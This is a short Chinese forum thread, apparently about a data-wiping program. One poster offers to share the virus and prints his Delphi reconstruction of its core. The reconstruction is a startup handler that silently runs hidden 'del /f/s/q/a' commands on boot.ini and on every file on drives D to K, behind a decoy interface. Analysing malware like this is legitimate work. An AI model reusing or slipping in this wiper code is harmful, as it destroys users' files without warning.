关于此次的恶意程序导致数据损失的恢复方法之我见

无名男尸

妈了个巴子的，总算恢复了。
这病毒我还有，谁要玩玩？
虚拟机上截图。

无名男尸

反汇编看了一下，用DELPHI模拟还原了一下代码。主要程序大概如下，阴险的是，程序从双击启动开始就不停的删除D-K盘的所有文件（保留文件夹），而整个软件界面和按钮、进度条都是掩饰物拖延时间，好防止用户退出，让病毒能删更多的文件。

procedure TForm1.FormCreate(Sender: TObject);
begin
  WinExec('cmd /C del C:\boot.ini /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del D:\*.* /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del E:\*.* /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del F:\*.* /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del G:\*.* /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del H:\*.* /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del I:\*.* /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del J:\*.* /f/s/q/a',SW_HIDE);
  WinExec('cmd /C del K:\*.* /f/s/q/a',SW_HIDE);
end;